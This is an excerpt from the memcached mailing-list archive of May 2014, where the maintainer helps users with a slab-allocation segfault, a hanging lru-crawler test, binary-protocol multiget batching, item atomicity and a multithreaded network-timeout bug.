 any related fix). My question is actually slightly different: I grep and I 
 do not see where we initialize slabclass_t.slots. It is set to 0 (zero)
 in slabs_init (by memset). I also see 8 usages across the file slabs.c, 
 including one declaration and one assert (that will cause a segfault :) ).
  

 In do_slabs_alloc, I immediately see this code:

 it = (item *)p->slots;
 p->slots = it->next;

 which assumes that p->slots contains something. But I do not see where 
 slots gets a value. I'm definitely missing something simple. Please point 
 me to this field's initialization code.

 (All other usages are in free and rebalance, which we do not use, and I 
 assume are hit after something is allocated :) )

 Thank you!

 segfault call stack:

 #0  do_slabs_alloc (size=853, id=11) at slabs.c:241

 #1  slabs_alloc (size=853, id=11) at slabs.c:404

 #2  0x0040edc4 in do_item_alloc (

     key=0x7f256713e4d4 
 "d_1_v1422c8a1df8a89589777042ac1257ea35|folder_by_id.2041369764.children", 
 nkey=71, 

     flags=<value optimized out>, exptime=1049722, nbytes=717, 
 cur_hv=2547497763) at items.c:150

 #3  0x00409476 in process_update_command (c=0x7f256451ed50, 
 tokens=<value optimized out>, 

     ntokens=<value optimized out>, comm=2, handle_cas=<value optimized out>) 
 at memcached.c:2917

 #4  0x004099ab in process_command (c=0x7f256451ed50, command=<value 
 optimized out>) at memcached.c:3258

 #5  0x0040a5a2 in try_read_command (c=0x7f256451ed50) at 
 memcached.c:3504

 #6  0x0040b1a8 in drive_machine (fd=<value optimized out>, 
 which=<value optimized out>, arg=0x7f256451ed50) at memcached.c:3824



Re: Memcached 1.4.19 Build Not Working - Compiling from Source

2014-05-28 Thread dormando
I may have misread. When you said the server was sitting at 100% CPU, what
exactly was using all of the CPU? memcached? perl?

On Wed, 28 May 2014, Alex Gemmell wrote:

 Yep, it's 1.4.20.  I followed the instructions here 
 (http://memcached.org/downloads) and ran "wget http://memcached.org/latest".
 Just to be sure, this morning I ran "wget 
 http://memcached.org/files/memcached-1.4.20.tar.gz" and tried to compile 
 it, and got exactly the same
 problem.

 I followed your instructions and here's the output (I hope I did this right?)

 ==
 (gdb) thread apply all bt

 Thread 7 (Thread 0x7fffe7fff700 (LWP 8785)):
 #0  0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib64/libpthread.so.0
 #1  0x00416bc9 in item_crawler_thread (arg=<value optimized out>) at 
 items.c:772
 #2  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
 #3  0x0036df8e8b7d in clone () from /lib64/libc.so.6

 Thread 6 (Thread 0x752dd700 (LWP 8773)):
 #0  0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib64/libpthread.so.0
 #1  0x0041860d in assoc_maintenance_thread (arg=<value optimized 
 out>) at assoc.c:251
 #2  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
 #3  0x0036df8e8b7d in clone () from /lib64/libc.so.6

 Thread 5 (Thread 0x75cde700 (LWP 8772)):
 #0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
 #1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
 #2  0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5
 #3  0x004197b5 in worker_libevent (arg=0x645f30) at thread.c:386
 #4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
 #5  0x0036df8e8b7d in clone () from /lib64/libc.so.6

 Thread 4 (Thread 0x766df700 (LWP 8771)):
 #0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
 #1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
 #2  0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5
 #3  0x004197b5 in worker_libevent (arg=0x642ba0) at thread.c:386
 ---Type <return> to continue, or q <return> to quit---
 #4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
 #5  0x0036df8e8b7d in clone () from /lib64/libc.so.6

 Thread 3 (Thread 0x770e0700 (LWP 8770)):
 #0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
 #1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
 #2  0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5
 #3  0x004197b5 in worker_libevent (arg=0x63f810) at thread.c:386
 #4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
 #5  0x0036df8e8b7d in clone () from /lib64/libc.so.6

 Thread 2 (Thread 0x77ae1700 (LWP 8769)):
 #0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
 #1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
 #2  0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5
 #3  0x004197b5 in worker_libevent (arg=0x63c480) at thread.c:386
 #4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
 #5  0x0036df8e8b7d in clone () from /lib64/libc.so.6

 Thread 1 (Thread 0x77b8d700 (LWP 8766)):
 #0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
 #1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
 #2  0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5
 #3  0x00408a25 in main (argc=<value optimized out>, argv=<value 
 optimized out>) at memcached.c:5628
 ==


 On Tuesday, 27 May 2014 19:09:56 UTC-7, Dormando wrote:
   You're completely sure that's the 1.4.20 source tree?

   That bug was pretty well fixed...

   If you are definitely testing a 1.4.20 binary, here's the way to grab a
   trace:

   start memcached-debug under gdb:

   gdb ./memcached-debug
handle SIGPIPE nostop noprint pass
r

   T_MEMD_USE_DAEMON=127.0.0.1:11211 prove -v t/lru-crawler.t

   ... wait until it's been spinning cpu for a few seconds. Then ^C the GDB
   window and run "thread apply all bt"
   ... and send me that info.

   On Tue, 27 May 2014, Alex Gemmell wrote:

Hello Dormando,
I am having exactly the same issue but with Memcached 1.4.20.
   
My server specs are: RHEL 6 (Linux 2.6.32-358.23.2.el6.x86_64), 
 1880MB RAM, single core :(
   
Here are the results of me running "prove -v t/lru-crawler.t".  It 
 took exactly 10m 15s to run before it timed out.  I watched htop
   while it was
running and the single CPU sat at 100% (which is to be expected, I 
 guess) but the total server memory barely changed and never rose
   above 330MB.
   
=
  prove -v t/lru-crawler.t
t/lru-crawler.t ..
1..189
ok 1
ok 2 - stored key
ok 3 - stored key
ok 4 - stored key
ok 5 - stored key

Re: Memcached 1.4.19 Build Not Working - Compiling from Source

2014-05-28 Thread dormando
Can you try this patch?
https://github.com/dormando/memcached/commit/724bfb34484347963a27051fed2b4312e189ace3

Either apply it yourself, or just download the raw file:
https://raw.githubusercontent.com/dormando/memcached/724bfb34484347963a27051fed2b4312e189ace3/t/lru-crawler.t

On Wed, 28 May 2014, Alex Gemmell wrote:

 Perl mostly.  Screenshot - https://cloudup.com/c-osDM4rjYU

 On Wednesday, 28 May 2014 11:16:22 UTC-7, Dormando wrote:
   I may have misread. When you said the server was sitting at 100% CPU, 
 what
   exactly was using all of the CPU? memcached? perl?

   On Wed, 28 May 2014, Alex Gemmell wrote:

Yep, it's 1.4.20.  I followed the instructions here 
 (http://memcached.org/downloads) and ran "wget http://memcached.org/latest".
Just to be sure, this morning I ran "wget 
 http://memcached.org/files/memcached-1.4.20.tar.gz" and tried to compile 
 it and got exactly
   the same
problem.
   
I followed your instructions and here's the output (I hope I did this 
 right?)
   
==
(gdb) thread apply all bt
   
Thread 7 (Thread 0x7fffe7fff700 (LWP 8785)):
#0  0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib64/libpthread.so.0
#1  0x00416bc9 in item_crawler_thread (arg=<value optimized 
 out>) at items.c:772
#2  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
#3  0x0036df8e8b7d in clone () from /lib64/libc.so.6
   
Thread 6 (Thread 0x752dd700 (LWP 8773)):
#0  0x0036dfc0b5bc in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /lib64/libpthread.so.0
#1  0x0041860d in assoc_maintenance_thread (arg=<value 
 optimized out>) at assoc.c:251
#2  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
#3  0x0036df8e8b7d in clone () from /lib64/libc.so.6
   
Thread 5 (Thread 0x75cde700 (LWP 8772)):
#0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
#1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
#2  0x77ba2c46 in event_base_loop () from 
 /usr/lib64/libevent-2.0.so.5
#3  0x004197b5 in worker_libevent (arg=0x645f30) at 
 thread.c:386
#4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
#5  0x0036df8e8b7d in clone () from /lib64/libc.so.6
   
Thread 4 (Thread 0x766df700 (LWP 8771)):
#0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
#1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
#2  0x77ba2c46 in event_base_loop () from 
 /usr/lib64/libevent-2.0.so.5
#3  0x004197b5 in worker_libevent (arg=0x642ba0) at 
 thread.c:386
---Type <return> to continue, or q <return> to quit---
#4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
#5  0x0036df8e8b7d in clone () from /lib64/libc.so.6
   
Thread 3 (Thread 0x770e0700 (LWP 8770)):
#0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
#1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
#2  0x77ba2c46 in event_base_loop () from 
 /usr/lib64/libevent-2.0.so.5
#3  0x004197b5 in worker_libevent (arg=0x63f810) at 
 thread.c:386
#4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
#5  0x0036df8e8b7d in clone () from /lib64/libc.so.6
   
Thread 2 (Thread 0x77ae1700 (LWP 8769)):
#0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
#1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
#2  0x77ba2c46 in event_base_loop () from 
 /usr/lib64/libevent-2.0.so.5
#3  0x004197b5 in worker_libevent (arg=0x63c480) at 
 thread.c:386
#4  0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0
#5  0x0036df8e8b7d in clone () from /lib64/libc.so.6
   
Thread 1 (Thread 0x77b8d700 (LWP 8766)):
#0  0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6
#1  0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5
#2  0x77ba2c46 in event_base_loop () from 
 /usr/lib64/libevent-2.0.so.5
#3  0x00408a25 in main (argc=<value optimized out>, argv=<value optimized out>) at memcached.c:5628
==
   
   
On Tuesday, 27 May 2014 19:09:56 UTC-7, Dormando wrote:
      You're completely sure that's the 1.4.20 source tree?
   
      That bug was pretty well fixed...
   
      If you are definitely testing a 1.4.20 binary, here's the way 
 to grab a
      trace:
   
      start memcached-debug under gdb:
   
      gdb ./memcached-debug
       handle SIGPIPE nostop noprint pass
       r

Re: Memcached 1.4.19 Build Not Working - Compiling from Source

2014-05-27 Thread dormando
You're completely sure that's the 1.4.20 source tree?

That bug was pretty well fixed...

If you are definitely testing a 1.4.20 binary, here's the way to grab a
trace:

start memcached-debug under gdb:

gdb ./memcached-debug
 handle SIGPIPE nostop noprint pass
 r

T_MEMD_USE_DAEMON=127.0.0.1:11211 prove -v t/lru-crawler.t

... wait until it's been spinning cpu for a few seconds. Then ^C the GDB
window and run "thread apply all bt"
.. and send me that info.
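
(If driving gdb interactively is awkward, an equivalent trace can be
captured by running memcached-debug normally and attaching from a second
terminal once it starts spinning CPU; this assumes a reasonably recent
gdb and Linux's pidof:)

    gdb -batch -ex 'thread apply all bt' -p $(pidof memcached-debug)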

On Tue, 27 May 2014, Alex Gemmell wrote:

 Hello Dormando,
 I am having exactly the same issue but with Memcached 1.4.20.

 My server specs are: RHEL 6 (Linux 2.6.32-358.23.2.el6.x86_64), 1880MB RAM, 
 single core :(

 Here are the results of me running "prove -v t/lru-crawler.t".  It took 
 exactly 10m 15s to run before it timed out.  I watched htop while it was
 running and the single CPU sat at 100% (which is to be expected I guess) but 
 the total server memory barely changed and never rose above 330MB.

 =
   prove -v t/lru-crawler.t
 t/lru-crawler.t ..
 1..189
 ok 1
 ok 2 - stored key
 ok 3 - stored key
 ok 4 - stored key
 ok 5 - stored key
 ok 6 - stored key
 ok 7 - stored key
 ok 8 - stored key
 ok 9 - stored key
 ok 10 - stored key
 ok 11 - stored key
 ok 12 - stored key
 ok 13 - stored key
 ok 14 - stored key
 ok 15 - stored key
 ok 16 - stored key
 ok 17 - stored key
 ok 18 - stored key
 ok 19 - stored key
 ok 20 - stored key
 ok 21 - stored key
 ok 22 - stored key
 ok 23 - stored key
 ok 24 - stored key
 ok 25 - stored key
 ok 26 - stored key
 ok 27 - stored key
 ok 28 - stored key
 ok 29 - stored key
 ok 30 - stored key
 ok 31 - stored key
 ok 32 - stored key
 ok 33 - stored key
 ok 34 - stored key
 ok 35 - stored key
 ok 36 - stored key
 ok 37 - stored key
 ok 38 - stored key
 ok 39 - stored key
 ok 40 - stored key
 ok 41 - stored key
 ok 42 - stored key
 ok 43 - stored key
 ok 44 - stored key
 ok 45 - stored key
 ok 46 - stored key
 ok 47 - stored key
 ok 48 - stored key
 ok 49 - stored key
 ok 50 - stored key
 ok 51 - stored key
 ok 52 - stored key
 ok 53 - stored key
 ok 54 - stored key
 ok 55 - stored key
 ok 56 - stored key
 ok 57 - stored key
 ok 58 - stored key
 ok 59 - stored key
 ok 60 - stored key
 ok 61 - stored key
 ok 62 - stored key
 ok 63 - stored key
 ok 64 - stored key
 ok 65 - stored key
 ok 66 - stored key
 ok 67 - stored key
 ok 68 - stored key
 ok 69 - stored key
 ok 70 - stored key
 ok 71 - stored key
 ok 72 - stored key
 ok 73 - stored key
 ok 74 - stored key
 ok 75 - stored key
 ok 76 - stored key
 ok 77 - stored key
 ok 78 - stored key
 ok 79 - stored key
 ok 80 - stored key
 ok 81 - stored key
 ok 82 - stored key
 ok 83 - stored key
 ok 84 - stored key
 ok 85 - stored key
 ok 86 - stored key
 ok 87 - stored key
 ok 88 - stored key
 ok 89 - stored key
 ok 90 - stored key
 ok 91 - stored key
 ok 92 - slab1 has 90 used chunks
 ok 93 - enabled lru crawler
 ok 94
 ok 95 - kicked lru crawler
 Timeout.. killing the process
 Failed 94/189 subtests

 Test Summary Report
 ---
 t/lru-crawler.t (Wstat: 13 Tests: 95 Failed: 0)
   Non-zero wait status: 13
   Parse errors: Bad plan.  You planned 189 tests but ran 95.
 Files=1, Tests=95, 600 wallclock secs ( 0.09 usr  0.01 sys + 352.24 cusr 
 61.28 csys = 413.62 CPU)
 Result: FAIL
 =

 Any ideas?


 On Thursday, 1 May 2014 18:28:57 UTC-7, Dormando wrote:
   What's the output of:

   $ prove -v t/lru-crawler.t

   How long are the tests taking to run? This has definitely been tested on
   ubuntu 12.04 (which is what I assume you meant?), but not something with
   so little RAM.

   On Thu, 1 May 2014, Wilfred Khalik wrote:

Hi guys,
   
I get the below failure error when I run the make test command:
   
Any help would be appreciated.I am running this on 512MB Digital 
 Ocean VPS by the way on Linux 12.0.4.4 LTS.
   
Slab Stats 64
Thread stats 200
Global stats 208
Settings 124
Item (no cas) 32
Item (cas) 40
Libevent thread 100
Connection 340

libevent thread cumulative 13100
Thread stats cumulative 13000
./testapp
1..48
ok 1 - cache_create
ok 2 - cache_constructor
ok 3 - cache_constructor_fail
ok 4 - cache_destructor
ok 5 - cache_reuse
ok 6 - cache_redzone
ok 7 - issue_161
ok 8 - strtol
ok 9 - strtoll
ok 10 - strtoul
ok 11 - strtoull
ok 12 - issue_44
ok 13 - vperror
ok 14 - issue_101
ok 15 - start_server
ok 16 - issue_92
ok 17 - issue_102
ok 18 - binary_noop
ok 19 - binary_quit
ok 20 - binary_quitq
ok 21 - binary_set
ok 22 - binary_setq
ok 23 - binary_add
ok 24 - binary_addq
ok 25 - binary_replace
ok 26 - binary_replaceq
ok 27

Re: Memcached read/write consistency

2014-05-12 Thread dormando
memcached's operations are all atomic. Always have been, always will be,
barring bugs.

Wouldn't be much use to anyone if you could have a get come back with
half a set... I answer this question a lot and it's pretty bizarre that
people think that's how it works.

Internally, items are generally immutable (except in one case). If you
set a new object in place of an old one, new memory is assigned, the old
one is removed from the hash table, and the new one put into it. The old
one sticks around so long as anyone is still reading from it, then it is
garbage collected (via refcounts). Reads are always consistent and writes
don't clobber each other. That would be *insane*.

The only exception is incr/decr, which will rewrite the existing item if
nobody else is accessing it at the time. If it is being accessed, it
allocates new memory as normal.
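
(For atomic read-modify-write beyond incr/decr, clients typically lean on
the gets/cas pair. An illustrative ascii-protocol session with a made-up
key; the number returned by gets is the CAS token:)

    gets visits
    VALUE visits 0 2 41
    17
    END
    cas visits 0 0 2 41
    18
    STORED

(If another writer got in between, cas answers EXISTS instead and the
client retries from the gets.)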

I wonder if I should bump this answer higher up on the wiki somewhere?
It's kind of a silly question but it does keep getting asked...

On Mon, 12 May 2014, Ezekiel Victor wrote:

 OK I just noticed that Membase is now Couchbase, but the point remains. Also 
 one of the things we talked about is if the server dies in the middle
 of a write, what level of protection do you have for the data that would have 
 been written? I guess this discussion would be more about Couchbase
 at this point.

 On Monday, May 12, 2014 2:33:29 PM UTC-7, Ezekiel Victor wrote:
   A coworker and I were having a discussion about whether to use MySQL or 
 memcached for a key-value store. My view is that memcached is
   designed to be exactly that, and if we desire persistence we can use 
 Membase. He alleged that memcached lacks read/write consistency,
   such that you can end up reading a half-value if you were to read in 
 the middle of a write. Is this true? I have used memcached under
   many thousands of reads/writes per second on a high traffic site and 
 never ran into any such problem.



1.4.20 released

2014-05-11 Thread dormando
fixes a hang regression seen in .18 and .19. does not affect .17 or newer.
no other changes.



Re: Multi-get implementation in binary protocol

2014-05-09 Thread dormando
Unfortunately binprot isn't that much faster processing-wise... what it
does give you is a bunch of safe features (batching sets, mixing
sets/gets and the like).

You *can* reduce the packet load on the server a bit by ensuring your
client is actually batching the binary multiget packets together, then
it's only the server increasing the packet load...
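
(To make the batching concrete, here's a minimal sketch in C of packing a
quiet multiget -- one getKQ frame per key plus a terminating NOOP -- into a
single write(). The opcodes come from the binary protocol spec; the fixed
buffer, missing bounds checks, and missing error handling are purely
illustrative:)

    #include <arpa/inet.h>   /* htons, htonl */
    #include <stdint.h>
    #include <string.h>
    #include <unistd.h>

    /* Append one 24-byte binary-protocol header plus the key.
     * 0x0d = getKQ: quiet get that echoes the key back on a hit. */
    static size_t add_getkq(uint8_t *buf, const char *key, uint16_t keylen) {
        memset(buf, 0, 24);
        buf[0] = 0x80;                     /* request magic */
        buf[1] = 0x0d;                     /* opcode: getKQ */
        uint16_t klen = htons(keylen);
        memcpy(buf + 2, &klen, 2);         /* key length */
        uint32_t blen = htonl(keylen);
        memcpy(buf + 8, &blen, 4);         /* total body length == key length */
        memcpy(buf + 24, key, keylen);     /* body is just the key */
        return 24 + keylen;
    }

    /* Queue every key quietly, then a NOOP (0x0a); the server streams back
     * hits as it reads, and the NOOP response marks the end of the batch. */
    static void multiget(int fd, const char **keys, int nkeys) {
        uint8_t buf[8192];                 /* sketch: assume the keys fit */
        size_t used = 0;
        for (int i = 0; i < nkeys; i++)
            used += add_getkq(buf + used, keys[i], (uint16_t)strlen(keys[i]));
        memset(buf + used, 0, 24);
        buf[used] = 0x80;
        buf[used + 1] = 0x0a;              /* opcode: noop */
        used += 24;
        write(fd, buf, used);              /* one syscall, one packet train */
    }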

On Fri, 9 May 2014, Byung-chul Hong wrote:

 Hello, Ryan, dormando,

 Thanks a lot for the clear explanation and the comments.
 I'm trying to find out how many requests I can batch as a multi-get within the 
 allowed latency.
 I think multi-get has many advantages; the only penalty is the longer latency, 
 as pointed out in the answer above.
 But, the longer latency may not be a real issue unless it exceeds some 
 threshold that the end users can notice.
 So, now I'm trying to use multi-get as much as possible.

 Actually, I had thought that the binary protocol would always be better than 
 the ascii protocol since it
 can reduce the burden of parsing on the server side, but it seems that I need 
 to test both cases.

 Thanks again for the comments, and I will share the result if I get some 
 interesting or useful data.

 Byungchul.



 2014-05-08 9:30 GMT+09:00 dormando dorma...@rydia.net:
Hello,
   
For now, I'm trying to evaluate the performance of memcached server 
 by using several client workloads.
I have a question about multi-get implementation in binary protocol.
As I know, in ascii protocol, we can send multiple keys in a single 
 request packet to implement multi-get.
   
But, in a binary protocol, it seems that we should send multiple 
 request packets (one request packet per key) to implement multi-get.
Even if we send multiple getQ requests, then a get for the last key, 
 we can only save response packets for cache misses.
If I understand correctly, multi-get in binary protocol cannot reduce 
 the number of request packets, and
it also cannot reduce the number of response packets if hit-ratio is 
 very high (like 99% get hit).
   
If the performance bottleneck is on the network side not on the CPU, 
 I think reducing the number of packets is still very important,
but I don't understand why the binary protocol doesn't care about 
 this.
Did I miss something?

 you're right, it sucks. I was never happy with it, but haven't had time to
 add adjustments to the protocol for this. To note, with .19 some
 inefficiencies with the protocol were lifted, and most network cards are
 fast enough for most situations, even if it's one packet per response (and
 for large enough responses they split into multiple packets, anyway).

 The reason why this was done is for latency and streaming of responses:

 - In ascii multiget, I can send 10,000 keys, but then I'm forced to wait for
 the server to look up all of the keys before it sends any responses. The
 delay isn't typically very high, but there's some latency to it.

 - In binary multiget, the responses are sent back as it receives them from
 the network more or less. This reduces the latency to when you start
 seeing responses, regardless of how large your multiget is. this is useful
 if you have a kind of client which can start processing responses in a
 streaming fashion. This potentially reduces the total time to render your
 response since you can keep the CPU busy unmarshalling responses instead
 of sleeping.

 However, it should have some tunables: One where it at least does one
 write per complete packet (TCP_CORK'ed, or similar), and one where it
 buffers up to some size. In my tests I can get ascii multiget up to 16.2
 million keys/sec, but (with the fixes in .19) binprot caps out at 4.6m and
 is spending all of its time calling sendmsg(). Most people need far, far
 less than that, so the binprot as is should be okay though.

 The code isn't too friendly to this and there're other higher priority
 things I'd like to get done sooner. The relatively few number of people
 who do 500,000+ requests per second in binprot (they're almost always
 ascii at that scale) is the other reason.


Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-09 Thread dormando
Can you give me a list (privately, if need be) of a few things:

- The exact OS your server is running (centos/redhat release/etc)
- The exact kernel version (and where it came from? centos/rh proper or a
3rd party repo?)
- Full list of your 3rd party repos, since I know you had some random
french thing in there.
- Full list of packages installed from 3rd party repos.

It is extremely important that all of the software matches.

- Hardware details:
  - Network card(s), speeds
  - CPU type, number of cores (hyperthreading?)
  - Amount of RAM

- Is this a hardware machine, or a VM somewhere? If a VM, what provider?

- memcached stats snapshots again, from your machine after it's been
running a while:
  - "stats", "stats slabs", "stats items", "stats settings", "stats conns".
^ That's five commands, don't forget any.
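
(One way to grab all five in a single connection, assuming a netcat that
waits for the server to close the stream; memcached runs the commands in
order and quit ends the session:)

    printf 'stats\r\nstats slabs\r\nstats items\r\nstats settings\r\nstats conns\r\nquit\r\n' \
        | nc 127.0.0.1 11211 > stats-snapshot.txt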

It's too difficult to try to debug the issue when you hit it. Usually
when I'm at a gdb console I'm issuing a command every second or two, but
it takes us 10 minutes to get through 3-4 commands. It'd be nice if I
could attempt to reproduce it here.

I went digging more and there're some dup() bugs with epoll, except your
libevent is new enough to have those patched.. plus we're not using dup()
in such a way to cause the bug.

There was also an EPOLL_CTL_MOD race condition in the kernel, but so far
as I can tell even with libevent 2.x libevent's not using that feature for
us.

The issue does smell like the bug that happens with dup()'s - the events
keep happening and the fd sits half closed, but again we're never closing
those sockets.

I can also make a branch with the new dup() calls explicitly removed, but
this continues to be obnoxious multi-week-long debugging.

I'm convinced that the code in memcached is correct and the bug exists
outside of it (libevent or the kernel). There's simply no way for it to
hit that code path without closing the socket, and doubly so: epoll
automatically deletes an event when the socket is closed. We delete it
then close it, and it still comes back.

It's not possible a connection ends up in the wrong thread, since both
connection initialization and close happens local to a thread. We would
need to have a new connection come in with a duplicated fd. If that
happens, nothing on your machine would work.

thanks.

On Thu, 8 May 2014, notificati...@commando.io wrote:

 I am just speculating, and by no means have any idea what I am really talking 
 about here. :)
 With 2 threads, still solid, no timeouts, no runaway 100% cpu. It's been days. 
 Increasing from 2 threads to 4 does not generate any more traffic or
 requests to memcached. Thus I am speculating perhaps it is a race condition 
 of some sort, only hitting with > 2 threads.

 Why do you say it will be less likely to happen with 2 threads than 4?

 On Wednesday, May 7, 2014 5:38:47 PM UTC-7, Dormando wrote:
   That doesn't really tell us anything about the nature of the problem
   though. With 2 threads it might still happen, but is a lot less likely.

   On Wed, 7 May 2014, notifi...@commando.io wrote:

Bumped up to 2 threads and so far no timeout errors. I'm going to let 
 it run for a few more days, then revert back to 4 threads and
   see if timeout
errors come up again. That will tell us the problem lies in spawning 
 more than 2 threads.
   
On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote:
      Hey,
   
      try this branch:
      https://github.com/dormando/memcached/tree/double_close
   
      so far as I can tell that emulates the behavior in .17...
   
      to build:
      ./autogen.sh && ./configure && make
   
      run it in screen like you were doing with the other tests, see 
 if it
      prints "ERROR: Double Close [somefd]". If it prints that once 
 then stops,
      I guess that's what .17 was doing... if it print spams, then 
 something
      else may have changed.
   
      I'm mostly convinced something about your OS or build is 
 corrupt, but I
      have no idea what it is. The only other thing I can think of is 
 to
      instrument .17 a bit more and have you try that (with the 
 connection code
      laid out the old way, but with a conn_closed flag to detect a 
 double close
      attempt), and see if the old .17 still did it.
   
      On Tue, 6 May 2014, notifi...@commando.io wrote:
   
       Changing from 4 threads to 1 seems to have resolved the 
 problem. No timeouts since. Should I set to 2 threads and wait and
   see how
      things go?
      
       On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote:
             and how'd that work out?
      
             Still no other reports :/ a few thousand more downloads 
 of .19...
      
             On Sun, 4 May 2014, notifi...@commando.io wrote

Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-08 Thread dormando
 I am just speculating, and by no means have any idea what I am really talking 
 about here. :)
 With 2 threads, still solid, no timeouts, no runaway 100% cpu. It's been days. 
 Increasing from 2 threads to 4 does not generate any more traffic or
 requests to memcached. Thus I am speculating perhaps it is a race condition 
 of some sort, only hitting with > 2 threads.

Doesn't tell me anything useful, since I'm already looking for potential
races and don't see any possibility outside of libevent.

 Why do you say it will be less likely to happen with 2 threads than 4?

Nature of race conditions: the more threads you have running the more
likely you are to hit them, sometimes on order of magnitudes.

It doesn't really change the fact that this has worked for many years and
the code *barely* changed recently. I just don't see it.

 On Wednesday, May 7, 2014 5:38:47 PM UTC-7, Dormando wrote:
   That doesn't really tell us anything about the nature of the problem
   though. With 2 threads it might still happen, but is a lot less likely.

   On Wed, 7 May 2014, notifi...@commando.io wrote:

Bumped up to 2 threads and so far no timeout errors. I'm going to let 
 it run for a few more days, then revert back to 4 threads and
   see if timeout
errors come up again. That will tell us the problem lies in spawning 
 more than 2 threads.
   
On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote:
      Hey,
   
      try this branch:
      https://github.com/dormando/memcached/tree/double_close
   
      so far as I can tell that emulates the behavior in .17...
   
      to build:
      ./autogen.sh && ./configure && make
   
      run it in screen like you were doing with the other tests, see 
 if it
      prints "ERROR: Double Close [somefd]". If it prints that once 
 then stops,
      I guess that's what .17 was doing... if it print spams, then 
 something
      else may have changed.
   
      I'm mostly convinced something about your OS or build is 
 corrupt, but I
      have no idea what it is. The only other thing I can think of is 
 to
      instrument .17 a bit more and have you try that (with the 
 connection code
      laid out the old way, but with a conn_closed flag to detect a 
 double close
      attempt), and see if the old .17 still did it.
   
      On Tue, 6 May 2014, notifi...@commando.io wrote:
   
       Changing from 4 threads to 1 seems to have resolved the 
 problem. No timeouts since. Should I set to 2 threads and wait and
   see how
      things go?
      
       On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote:
             and how'd that work out?
      
             Still no other reports :/ a few thousand more downloads 
 of .19...
      
             On Sun, 4 May 2014, notifi...@commando.io wrote:
      
              I'm going to try switching threads from 4 to 1. This 
 host web2 is the only one I am seeing it on, but it also is
   the only
       host
             that gets any
              real traffic. Super frustrating.
             
              On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando 
 wrote:
                    I'm stumped. (also, your e-mails aren't 
 updating the ticket...).
             
                    It's impossible for a connection to get into 
 the closed state without
                    having event_del() and close() called on the 
 socket. A socket slot isn't
                    event_add()'ed again until after the state is 
 reset to 'init_state'.
             
                    There was no code path for event_del to 
 actually fail so far as I could
                    see.
             
                    I've e-mailed steven grimm for ideas but either 
 that's not his e-mail
                    anymore or he's not going to respond.
             
                    I really don't know. I guess the old code 
 would've just called conn_close
                    again by accident... I don't see how the logic 
 changed in any significant
                    way in .18. Though again, if it happened with 
 any frequency people's
                    curr_conns stat would go negative.
             
                    So... either that always happened and we never 
 noticed, or your particular
                    OS is corrupt. There're probably 10,000+ 
 installs of .18+ now and only one
                    complaint, so I'm a little hesitant to spend a 
 ton of time on this until
                    we get more reports

Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout

2014-05-08 Thread dormando
To that note, it *is* useful if you try that branch I posted, since so far
as I can tell that should emulate the .17 behavior.

On Thu, 8 May 2014, dormando wrote:

  I am just speculating, and by no means have any idea what I am really 
  talking about here. :)
  With 2 threads, still solid, no timeouts, no runaway 100% cpu. It's been 
  days. Increasing from 2 threads to 4 does not generate any more traffic or
  requests to memcached. Thus I am speculating perhaps it is a race condition 
  of some sort, only hitting with > 2 threads.

 Doesn't tell me anything useful, since I'm already looking for potential
 races and don't see any possibility outside of libevent.

  Why do you say it will be less likely to happen with 2 threads than 4?

 Nature of race conditions: the more threads you have running the more
 likely you are to hit them, sometimes on order of magnitudes.

 It doesn't really change the fact that this has worked for many years and
 the code *barely* changed recently. I just don't see it.

